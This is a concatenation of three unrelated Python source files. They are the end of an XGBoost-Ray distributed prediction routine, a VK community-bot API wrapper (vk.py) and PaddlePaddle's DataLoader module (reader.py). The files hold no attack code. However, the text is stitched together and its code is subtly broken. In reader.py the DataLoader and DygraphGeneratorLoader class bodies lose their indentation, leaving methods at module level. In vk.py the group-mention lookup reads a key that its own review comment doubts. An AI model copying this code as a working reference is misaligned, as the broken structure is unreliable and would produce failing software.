    actors down again. Raises (after force-shutdown) on any failure.
    """
    _assert_ray_support()
    if not ray.is_initialized():
        ray.init()
    # Spawn one remote actor per configured worker.
    num_gpus = ray_params.gpus_per_actor if ray_params.gpus_per_actor >= 0 \
        else 0
    actors = []
    for rank in range(ray_params.num_actors):
        actors.append(
            _create_actor(
                rank=rank,
                num_actors=ray_params.num_actors,
                num_cpus_per_actor=ray_params.cpus_per_actor,
                num_gpus_per_actor=num_gpus,
                resources_per_actor=ray_params.resources_per_actor,
                distributed_callbacks=ray_params.distributed_callbacks))
    logger.info(f"[RayXGBoost] Created {len(actors)} remote actors.")
    # Trigger the data load on every actor and wait for all of them.
    load_refs = []
    for actor in actors:
        load_refs.extend(_trigger_data_load(actor, data, []))
    try:
        ray.get(load_refs)
    except Exception as exc:
        logger.warning(f"Caught an error during prediction: {str(exc)}")
        _shutdown(actors, force=True)
        raise
    # Put the model into the object store once so all actors share it.
    model_ref = ray.put(model)
    logger.info("[RayXGBoost] Starting XGBoost prediction.")
    prediction_refs = [
        actor.predict.remote(model_ref, data, **kwargs) for actor in actors
    ]
    try:
        actor_results = ray.get(prediction_refs)
    except Exception as exc:
        logger.warning(f"Caught an error during prediction: {str(exc)}")
        _shutdown(actors=actors, force=True)
        raise
    _shutdown(actors=actors, force=False)
    return combine_data(data.sharding, actor_results)
@PublicAPI(stability="beta")
def predict(model: xgb.Booster,
            data: RayDMatrix,
            ray_params: Union[None, RayParams, Dict] = None,
            _remote: Optional[bool] = None,
            **kwargs) -> Optional[np.ndarray]:
    """Distributed XGBoost predict via Ray.
    This function will connect to a Ray cluster, create ``num_actors``
    remote actors, send data shards to them, and have them predict labels
    using an XGBoost booster model. The results are then combined and
    returned.
    Args:
        model (xgb.Booster): Booster object to call for prediction.
        data (RayDMatrix): Data object containing the prediction data.
        ray_params (Union[None, RayParams, Dict]): Parameters to configure
            Ray-specific behavior. See :class:`RayParams` for a list of valid
            configuration parameters.
        _remote (bool): Whether to run the driver process in a remote
            function. This is enabled by default in Ray client mode.
        **kwargs: Keyword arguments will be passed to the local
            `xgb.predict()` calls.
    Returns: ``np.ndarray`` containing the predicted labels.
    """
    os.environ.setdefault("RAY_IGNORE_UNHANDLED_ERRORS", "1")
    if xgb is None:
        raise ImportError(
            "xgboost package is not installed. XGBoost-Ray WILL NOT WORK. "
            "FIX THIS by running `pip install \"xgboost-ray\"`.")
    if _remote is None:
        # Default to remote execution when connected via the Ray client
        # and not already inside a Tune session.
        _remote = _is_client_connected() and \
            not is_session_enabled()
    if not ray.is_initialized():
        ray.init()
    if _remote:
        # Run as a remote function to support Ray client mode.
        return ray.get(
            ray.remote(num_cpus=0)(predict).remote(
                model, data, ray_params, _remote=False, **kwargs))
    _maybe_print_legacy_warning()
    ray_params = _validate_ray_params(ray_params)
    # A negative max_actor_restarts means "retry forever".
    max_actor_restarts = ray_params.max_actor_restarts \
        if ray_params.max_actor_restarts >= 0 else float("inf")
    _assert_ray_support()
    if not isinstance(data, RayDMatrix):
        # Fixed: the message previously referred to `train()` even though
        # this is the `predict()` entry point.
        raise ValueError(
            "The `data` argument passed to `predict()` is not a RayDMatrix, "
            "but of type {}. "
            "\nFIX THIS by instantiating a RayDMatrix first: "
            "`data = RayDMatrix(data=data)`.".format(type(data)))
    tries = 0
    # Retry loop: prediction restarts from scratch after an actor failure.
    while tries <= max_actor_restarts:
        try:
            return _predict(model, data, ray_params=ray_params, **kwargs)
        except RayActorError as exc:
            if tries + 1 <= max_actor_restarts:
                logger.warning(
                    "A Ray actor died during prediction. Trying to restart "
                    "prediction from scratch. "
                    "Sleeping for 10 seconds for cleanup.")
                time.sleep(10)
            else:
                # Chain the actor error so the root cause stays visible.
                raise RuntimeError(
                    "A Ray actor died during prediction and the maximum "
                    "number of retries ({}) is exhausted.".format(
                        max_actor_restarts)) from exc
        tries += 1
    return None
|
vk.py | # -*- coding: utf-8 -*-
import asyncio
import collections
import functools
import json
import time
from typing import List, Optional
from threading import Thread
from vk_api import VkApi
from vk_api.bot_longpoll import VkBotEventType, VkBotLongPoll
from vk_api.execute import VkFunction
from vk_api.upload import VkUpload
from vk_api.utils import get_random_id
API_VERSION = '5.130'
vk_execute = VkFunction(
args=('methods',),
clean_args=('methods',),
code='''
%(methods)s;
return 1;
''')
def threaded(fn):
    """Decorator: run ``fn`` in a daemon thread on every call.

    Each call to the wrapped function starts a new daemon ``Thread`` and
    returns immediately; the wrapped function's return value is discarded.
    ``functools.wraps`` preserves the decorated function's metadata
    (``__name__``, ``__doc__``), which the original decorator lost.
    """
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        Thread(target=fn, args=args, kwargs=kwargs, daemon=True).start()
    return wrapper
class VKMessage:
    """Lightweight view over a raw VK message dict.

    Exposes the commonly used fields as attributes and provides a
    ``reply(...)`` shortcut that sends back to the originating peer.
    """
    __slots__ = ('id', 'peer_id', 'user_id', 'text', 'payload', 'reply')
    def __init__(self, raw: dict, vk: 'VK') -> None:
        # Copy the plain fields straight from the raw event payload.
        for slot, key in (('id', 'id'), ('peer_id', 'peer_id'),
                          ('user_id', 'from_id'), ('text', 'text')):
            setattr(self, slot, raw[key])
        # 'payload' is an optional JSON-encoded string (e.g. button data).
        if 'payload' in raw:
            self.payload = json.loads(raw['payload'])
        else:
            self.payload = None
        # Pre-bind the peer id so handlers can simply call msg.reply(text).
        self.reply = functools.partial(vk.send, self.peer_id)
class VK:
    """Thin wrapper around the VK community (bot) API.

    Owns the API session, an outgoing message queue flushed in batches
    of 25 via ``execute`` (see ``messages_sender``), an incoming event
    queue filled by a long-poll background thread (``event_handler``),
    and a cache of user/group lookups.
    """
    __slots__ = ('vk', 'logger', 'event_queue', 'msg_queue', 'user_cache', 'group_id')
    def __init__(self, token: str, logger) -> None:
        self.vk = VkApi(token=token, api_version=API_VERSION)
        self.logger = logger
        # Incoming long-poll events / messages, consumed elsewhere (FIFO).
        self.event_queue = collections.deque()
        # Outgoing message payloads; drained by ``messages_sender``.
        self.msg_queue = []
        # target_id -> API response item from users.get / groups.getById.
        self.user_cache = {}
        self.group_id = self.method('groups.getById')[0]['id']
        self.init_group_settings()
    def method(self, method: str, args: dict = None) -> dict:
        """Proxy a raw API call to the underlying ``VkApi`` session."""
        return self.vk.method(method, args)
    def send(self, peer_id: int, message: str, keyboard=None, attach=None, sticker=None, disable_mentions=True) -> None:
        """Queue a message for sending.

        Texts between 4000 and 100000 characters (without attachment or
        sticker) are split into 4000-character chunks, one queue entry
        per chunk; everything else is queued as a single message.
        """
        if 4000 < len(message) < 100000 and (not attach) and (not sticker):
            for message_part in [message[j:j + 4000] for j in range(0, len(message), 4000)]:
                self.msg_queue.append({'peer_id': peer_id, 'message': message_part, 'random_id': get_random_id(), 'disable_mentions': disable_mentions,
                                       'keyboard': keyboard})
        else:
            self.msg_queue.append({'peer_id': peer_id, 'message': message, 'random_id': get_random_id(), 'disable_mentions': disable_mentions,
                                   'keyboard': keyboard, 'attachment': attach, 'sticker_id': sticker})
    def send_multiple(self, peer_ids: List[int], message: str, keyboard=None, disable_mentions=True) -> None:
        """Queue one message addressed to several peers at once."""
        self.msg_queue.append({'peer_ids': peer_ids, 'message': message, 'random_id': get_random_id(), 'disable_mentions': disable_mentions,
                               'keyboard': keyboard})
    def get_user_link(self, target_id: int, name_case: str = 'nom') -> str:
        """Return a clickable mention like ``[id123|Name]``.

        NOTE(review): for positive ids the final branch re-fetches
        ``users.get`` unconditionally, bypassing the cache populated
        above — confirm whether the refetch is intentional. For negative
        (group) ids the mention reads ``first_name``, but
        ``groups.getById`` items typically carry ``name`` instead —
        verify against the actual API response.
        """
        if target_id not in self.user_cache and target_id != 0:
            if target_id < 0:
                self.user_cache[target_id] = self.method('groups.getById', {'group_id': -target_id})[0]
            else:
                self.user_cache[target_id] = self.method('users.get', {'user_ids': target_id, 'name_case': name_case})[0]
        if target_id < 0:
            return ''.join(['[id', str(target_id), '|', self.user_cache[target_id]['first_name'], ']'])
        elif target_id == 0:
            return '@id0'
        else:
            self.user_cache[target_id] = self.method('users.get', {'user_ids': target_id, 'name_case': name_case})[0]
            return f"[id{target_id}|{self.user_cache[target_id]['first_name']}]"
    def get_user_links(self, target_ids: List[int]) -> dict:
        """Return ``{user_id: mention}`` for several user ids.

        Performs a single batched ``users.get`` call when any id is
        missing from the cache.
        """
        cached = True
        for i in target_ids:
            if i not in self.user_cache:
                cached = False
                break
        if not cached:
            for i in self.method('users.get', {'user_ids': ','.join(list(map(str, target_ids)))}):
                self.user_cache[i['id']] = i
        return {i: f"[id{i}|{self.user_cache[i]['first_name']}]" for i in target_ids}
    def get_target_id(self, s: str) -> Optional[int]:
        """Parse a user/group reference into a numeric id.

        Accepts URLs, ``@`` mentions, ``[id...|...]`` markup, or screen
        names; group ids are returned negative. Returns None when a
        screen name cannot be resolved.
        """
        r = s.replace('https://', '').replace('vk.com/', '').replace('@id', '').replace('@', '').replace('[', '').replace(']', '')
        if '|' in r:
            r = r.split('|')[0]
        if not r.isdecimal():
            # Resolve screen names ('-123' style group refs become 'club123').
            r = self.method('utils.resolveScreenName', {'screen_name': r.replace('-', 'club')})
            if not r:
                return
            if r['type'] == 'user':
                r = r['object_id']
            elif r['type'] == 'group':
                r = -r['object_id']
        return int(r)
    def is_chat_member(self, peer_id: int, user_id: int) -> Optional[bool]:
        """True if ``user_id`` is a member of the chat; None (falsy)
        otherwise."""
        members = self.method('messages.getConversationMembers', {'peer_id': peer_id})['items']
        for i in members:
            if i['member_id'] == user_id:
                return True
    def is_chat_admin(self, peer_id: int, user_id: int, check_if_owner: bool = False) -> Optional[bool]:
        """True if ``user_id`` is a chat admin (or the owner, when
        ``check_if_owner`` is set); None (falsy) otherwise."""
        members = self.method('messages.getConversationMembers', {'peer_id': peer_id})['items']
        for i in members:
            if i['member_id'] == user_id and 'is_admin' in i and i['is_admin'] and ((not check_if_owner) or ('is_owner' in i and i['is_owner'])):
                return True
    def get_chat_owner(self, peer_id: int) -> Optional[int]:
        """Return the member_id of the chat owner, or None if not found."""
        members = self.method('messages.getConversationMembers', {'peer_id': peer_id})['items']
        for i in members:
            if 'is_owner' in i and i['is_owner']:
                return i['member_id']
    def get_upload(self) -> VkUpload:
        """Return a fresh upload helper bound to this API session."""
        return VkUpload(self.vk)
    def init_group_settings(self) -> None:
        """Enable bot messaging capabilities and long-poll for the group."""
        self.method('groups.setSettings', {
            'group_id': self.group_id,
            'messages': 1,
            'bots_capabilities': 1,
            'bots_start_button': 1,
            'bots_add_to_chat': 1,
        })
        self.method('groups.setLongPollSettings', {
            'group_id': self.group_id,
            'enabled': 1,
            'api_version': API_VERSION,
            'message_new': 1,
        })
    async def messages_sender(self) -> None:
        """Asyncio task: drain ``msg_queue`` in batches of up to 25.

        Each batch is sent as one ``execute`` request; the queue is
        polled every 50 ms. Send errors are logged and the loop goes on.
        """
        while True:
            queue = self.msg_queue[:25]
            if queue:
                self.msg_queue = self.msg_queue[25:]
                try:
                    vk_execute(self.vk, ''.join(('API.messages.send(' + json.dumps(i, ensure_ascii=False, separators=(',', ':')) + ');') for i in queue))
                except Exception as ex:
                    self.logger.warning('Произошла ошибка при отправке сообщений', exc_info=ex)
            await asyncio.sleep(0.05)
    @threaded
    def event_handler(self) -> None:
        """Background thread: feed ``event_queue`` forever.

        First seeds the queue with up to 200 unanswered conversations,
        then forwards long-poll events (new messages wrapped in
        ``VKMessage``, everything else raw). Long-poll errors are
        logged and retried after a 3 second pause.
        """
        convs = self.method('messages.getConversations', {'count': 200, 'filter': 'unanswered'})['items']
        for i in convs:
            self.event_queue.append(VKMessage(i['last_message'], self))
        lp = VkBotLongPoll(self.vk, self.group_id)
        while True:
            try:
                for event in lp.check():
                    if event.type == VkBotEventType.MESSAGE_NEW:
                        self.event_queue.append(VKMessage(event.raw['object']['message'], self))
                    else:
                        self.event_queue.append(event)
            except Exception as ex:
                self.logger.warning('Произошла ошибка в LongPoll', exc_info=ex)
                time.sleep(3)
|
reader.py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
from .framework import _get_paddle_place, _get_paddle_place_list
from paddle.fluid.framework import _set_expected_place, _current_expected_place
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
import queue
# NOTE: [ avoid hanging & failed quickly ] These value is used in getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
    """Get (no arguments) or set (one bool argument) KEEP_DATA_LOADER_ORDER."""
    global KEEP_DATA_LOADER_ORDER
    if args:
        assert len(args) == 1 and isinstance(args[0], bool)
        KEEP_DATA_LOADER_ORDER = args[0]
    else:
        return KEEP_DATA_LOADER_ORDER
def use_pinned_memory(*args):
    """Get (no arguments) or set (one bool argument) USE_PINNED_MEMORY."""
    global USE_PINNED_MEMORY
    if args:
        assert len(args) == 1 and isinstance(args[0], bool)
        USE_PINNED_MEMORY = args[0]
    else:
        return USE_PINNED_MEMORY
def _convert_places(places):
    """Normalize *places* (single place or sequence) into a list of core.Place."""
    if not isinstance(places, (list, tuple)):
        places = [places]
    converted = []
    for place in places:
        if isinstance(place, core.Place):
            converted.append(place)
        else:
            # Wrap concrete places (CPUPlace/CUDAPlace/...) in a generic Place.
            wrapped = core.Place()
            wrapped.set_place(place)
            converted.append(wrapped)
    return converted
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
    """Worker-process entry point: read batches from *batch_reader* into *data_queue*.

    Converts every batch to a tensor list, pushes it to the inter-process
    queue, then pushes a trailing ``None`` as the end-of-data sentinel.
    """
    try:
        # set signal handler
        core._set_process_signal_handler()
        # NOTE: [ mmap files clear ] When the child process exits unexpectedly,
        # some shared memory objects may have been applied for but have not yet
        # been put into the inter-process Queue. This part of the object needs
        # to be cleaned up when the process ends.
        CleanupFuncRegistrar.register(_cleanup_mmap)
        for batch in batch_reader():
            tensor_list = core._convert_to_tensor_list(batch)
            data_queue.put(tensor_list)
            # Drop this process's handles to the mmap fds once queued.
            core._remove_tensor_list_mmap_fds(tensor_list)
        # End-of-data sentinel consumed by the reader thread in the main process.
        data_queue.put(None)
    except KeyboardInterrupt:
        # NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
        pass
    except:
        six.reraise(*sys.exc_info())
class DataLoaderBase(object):
    """Common base for DataLoader iterator implementations.

    Subclasses must implement ``__iter__`` and ``__next__``.
    """

    def __init__(self):
        self._places = None

    def __call__(self):
        # Calling the loader returns itself, so `for x in loader()` and
        # `for x in loader` behave identically.
        return self

    def next(self):
        '''
        Get the next item in the DataLoader object. This method
        should not be called by users directly. It is used for
        implementing iterator protocol of Python 2.x inside
        PaddlePaddle framework.
        '''
        return self.__next__()

    def __iter__(self):
        raise NotImplementedError()

    def __next__(self):
        raise NotImplementedError()

    @classmethod
    def _check_input_array(cls, item):
        """Convert *item* to a regular ndarray; raise TypeError for ragged data.

        Fix: ``np.object`` was removed in NumPy 1.24 (AttributeError here),
        and modern NumPy raises ValueError for ragged nested sequences inside
        ``np.asarray`` itself — both cases are normalized to the TypeError
        this method has always raised.
        """
        try:
            arr = np.asarray(item)
        except ValueError:
            # NumPy >= 1.24: ragged input fails conversion instead of
            # producing an object-dtype array.
            arr = None
        if arr is None or arr.dtype == object:
            raise TypeError(
                "\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
                "this means the input data contains nested lists with different lengths. "
                "\n\t* Check the reader function passed to 'decorate_batch_generator'"
                " to locate the data causes this issue.\n\t* Please consider using "
                "'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
        return arr
class DataLoader(object):
"""
DataLoader provides an iterator which iterates the given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-process data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style dataset and iterable-style dataset.
For map-style dataset (can get a sample from dataset with a given
index), please see :code:`paddle.io.Dataset`.
For iterable-style dataset (get samples from dataset iteratively,
like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
.. note::
GPU tensor operation is not supported in subprocess currently,
please don't use GPU tensor operations in pipeline which will
be performed in subprocess, such as dataset transforms, collate_fn,
etc. Numpy array and CPU tensor operation is supported.
**Disable automatic batching**
In certain cases such as some NLP tasks, instead of automatic batching,
handling batching manually in dataset is needed by users. For these
cases, automatic batching is disabled if both :attr:`batch_size` and
:attr:`batch_sampler` is set as None, each data got from :attr:`dataset`
should be batched data and will be processed with function define by
:attr:`collate_fn` or :attr:`default_collate_fn`.
.. note::
When automatic batching is disabled, :attr:`default_collate_fn` will
do nothing to data from dataset.
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|list(str)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None. If ``places`` is list of string,
the string in the list can be ``cpu``, ``gpu:x`` and ``gpu_pinned``,
where ``x`` is the index of the GPUs.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed Tensors. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default True.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int|None): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whether to shuffle indices order before generating
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating system) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data form output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subproces starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each element of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
             dataset,
             feed_list=None,
             places=None,
             return_list=True,
             batch_sampler=None,
             batch_size=1,
             shuffle=False,
             drop_last=False,
             collate_fn=None,
             num_workers=0,
             use_buffer_reader=True,
             use_shared_memory=True,
             timeout=0,
             worker_init_fn=None,
             persistent_workers=False):
    """Validate arguments and resolve the batching strategy.

    See the class docstring for the meaning of each argument.
    """
    self.return_list = return_list
    self.collate_fn = collate_fn
    self.use_buffer_reader = use_buffer_reader
    self.worker_init_fn = worker_init_fn
    assert isinstance(dataset, Dataset), \
        "dataset should be subclass instance of paddle.io.Dataset"
    self.dataset = dataset
    # Static graph with dict-style returns needs feed targets to name outputs.
    if not return_list and not in_dygraph_mode():
        assert feed_list is not None, \
            "feed_list should be set when return_list=False"
    self.feed_list = feed_list
    if places is None:
        places = _current_expected_place()
    if isinstance(places, (list, tuple)):
        places = _get_paddle_place_list(places)
    else:
        places = _get_paddle_place(places)
    self.places = _convert_places(places)
    assert num_workers >= 0, "num_workers should be a non-negative value"
    # Multi-process loading is only supported on Linux; silently degrade elsewhere.
    if num_workers > 0 and (sys.platform == 'darwin' or
                            sys.platform == 'win32'):
        warnings.warn(
            "DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
            " Please use signle-process mode with num_workers = 0 instead")
        num_workers = 0
    self.num_workers = num_workers
    self.use_shared_memory = use_shared_memory
    # Shared memory only matters when worker subprocesses exist.
    if use_shared_memory and num_workers == 0:
        self.use_shared_memory = False
    assert timeout >= 0, "timeout should be a non-negative value"
    self.timeout = timeout
    if isinstance(dataset, IterableDataset):
        self.dataset_kind = _DatasetKind.ITER
        # Iterable datasets have no indices, so shuffle/batch_sampler are invalid.
        if shuffle:
            raise ValueError(
                "IterableDataset not support shuffle, but got shuffle={}".
                format(shuffle))
        if batch_sampler is not None:
            raise ValueError(
                "IterableDataset expect unspecified batch_sampler")
    else:
        self.dataset_kind = _DatasetKind.MAP
    if batch_sampler is not None:
        # A user-provided sampler fully controls batching.
        assert batch_size == 1 and not shuffle and not drop_last, \
            "batch_size/shuffle/drop_last should not be set when " \
            "batch_sampler is given"
        self.batch_sampler = batch_sampler
        self.batch_size = None
    elif batch_size is None:
        # Automatic batching disabled: dataset yields ready-made batches.
        self.batch_sampler = None
        self.batch_size = None
    else:
        assert batch_size > 0, \
            "batch_size should be None or a positive value when " \
            "batch_sampler is not given"
        self.batch_size = batch_size
        if isinstance(dataset, IterableDataset):
            self.batch_sampler = _InfiniteIterableSampler(dataset,
                                                          batch_size)
        else:
            self.batch_sampler = BatchSampler(
                dataset=dataset,
                batch_size=batch_size,
                shuffle=shuffle,
                drop_last=drop_last)
    self.drop_last = drop_last
    # Auto-collate iff some sampler yields index batches to be stacked.
    self.auto_collate_batch = self.batch_sampler is not None
    self.pin_memory = False
    if in_dygraph_mode():
        self.pin_memory = True if use_pinned_memory(
        ) is None else use_pinned_memory()
    self._persistent_workers = persistent_workers
    self._iterator = None
def __len__(self):
    """Number of mini-batches (auto-batching) or samples; undefined for iterable datasets."""
    if self.dataset_kind == _DatasetKind.ITER:
        raise ValueError("length of IterableDataset not supported")
    # With auto-collation the length is the batch count, otherwise the sample count.
    source = self.batch_sampler if self.auto_collate_batch else self.dataset
    return len(source)
def __iter__(self):
    """Create an epoch iterator; reuses one iterator when persistent_workers is set."""
    if self.num_workers == 0:
        return _DataLoaderIterSingleProcess(self)
    if not self._persistent_workers:
        return _DataLoaderIterMultiProcess(self)
    # Persistent workers: keep a single multiprocess iterator alive across epochs.
    if self._iterator is None:
        self._iterator = _DataLoaderIterMultiProcess(self)
    else:
        self._iterator._reset()
    return self._iterator
def __call__(self):
    """Alias for ``iter(self)``, kept so ``for x in loader()`` also works."""
    return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
                   capacity=None,
                   use_double_buffer=True,
                   iterable=True,
                   return_list=False,
                   use_multiprocess=False,
                   drop_last=True):
    """
    Create a DataLoader object for loading data from a Python generator.

    .. warning::
        This API will be deprecated in the future, it is recommended to use
        :code:`paddle.io.DataLoader` which supports multi-processes acceleration.

    .. note::
        The framework ensures that the data loading order of DataLoader is
        exactly the same as the user-defined data source.

    Data would be prefetched using a Python thread and pushed into a queue
    asynchronously. Set the data source on the returned loader with one of
    :code:`set_sample_generator`, :code:`set_sample_list_generator` or
    :code:`set_batch_generator`.

    If iterable = True, the created DataLoader object is a Python generator
    object, iterable with a for-range loop. If iterable = False, the created
    DataLoader object provides :code:`start()` and :code:`reset()` methods
    to control the data reading process.

    Args:
        feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list. The
            Tensors should be created by :code:`fluid.data()`.
        capacity (int): capacity of the queue maintained in DataLoader, in
            batches. Set a larger capacity if your reader is fast.
        use_double_buffer (bool): whether to prefetch the next batch with a
            double_buffer_reader, speeding up feeding at the cost of one
            extra batch of CPU or GPU memory.
        iterable (bool): whether the created DataLoader is iterable.
        return_list (bool): whether the return value on each device is
            presented as a list (recommended True in dygraph mode) or as a
            dict of str -> LoDTensor keyed by fed Tensor names (recommended
            False in static graph mode). Only valid when iterable=True.
        use_multiprocess (bool): whether to use multi-process to speed up
            dygraph data loading; has no effect in static graph mode.
            Default False.
        drop_last (bool): whether to drop last batches whose number is less
            than the CPU core/GPU card number. Keep the default True during
            training; set False for inference so trailing batches are kept.

    Returns:
        loader (DataLoader): the created DataLoader object.
    """
    # Dygraph mode uses its own loader implementation; note drop_last is
    # only honored by the static-graph GeneratorLoader.
    if in_dygraph_mode():
        return DygraphGeneratorLoader(feed_list, capacity,
                                      use_double_buffer, iterable,
                                      return_list, use_multiprocess)
    return GeneratorLoader(feed_list, capacity, use_double_buffer,
                           iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
    """
    Create an iterable DataLoader object for loading data from a Dataset.

    .. warning::
        This API will be deprecated in the future, it is recommended to use
        :code:`paddle.io.DataLoader` which supports multi-processes acceleration.

    Dataset is only supported in Linux systems currently.

    Args:
        dataset (InMemoryDataset|QueueDataset): the dataset object.
        places (list(CUDAPlace)|list(CPUPlace)|list(str)): places where the
            result data should be converted. Strings may be ``cpu``,
            ``gpu:x`` or ``gpu_pinned``, where x is the index of the GPU.
        drop_last (bool): whether to drop the last batch whose sample number
            is less than the batch size; dropped when True, kept when False.

    Returns:
        loader (DataLoader): the created DataLoader object, which can be
            treated as a Python generator.
    """
    return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
The multiprocess dygraph GeneratorLoader's most functions are different from
static graph GeneratorLoader, Separate implementation to keep code readable.
"""
def __init__(self,
             feed_list=None,
             capacity=None,
             use_double_buffer=True,
             iterable=True,
             return_list=True,
             use_multiprocess=False):
    """Set up loader state; forces iterable/list mode, optional multiprocess feeding."""
    self._batch_reader = None
    self._places = None
    self._feed_list = feed_list
    if not capacity:
        raise ValueError("Please give value to capacity.")
    self._capacity = capacity
    self._use_double_buffer = use_double_buffer
    # Dygraph loader only supports iterable mode — warn and override.
    if not iterable:
        warnings.warn(
            "Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
        )
    self._iterable = True
    # Likewise only list-style returns are supported.
    if not return_list:
        warnings.warn(
            "Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
        )
    self._return_list = True
    # NOTE: the multiprocessing in different platform is incompatible, we will solve it later
    self._use_multiprocess = use_multiprocess
    if self._use_multiprocess and (sys.platform == 'darwin' or
                                   sys.platform == 'win32'):
        warnings.warn(
            "NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
        )
        self._use_multiprocess = False
    if self._use_multiprocess:
        # NOTE: the multiprocessing.Queue used to save loading data in self._process
        self._data_queue = None
        # NOTE: this process is used to load data asynchronously from self._batch_reader
        self._process = None
    # NOTE: the C++ LoDTensorBlockingQueue instance
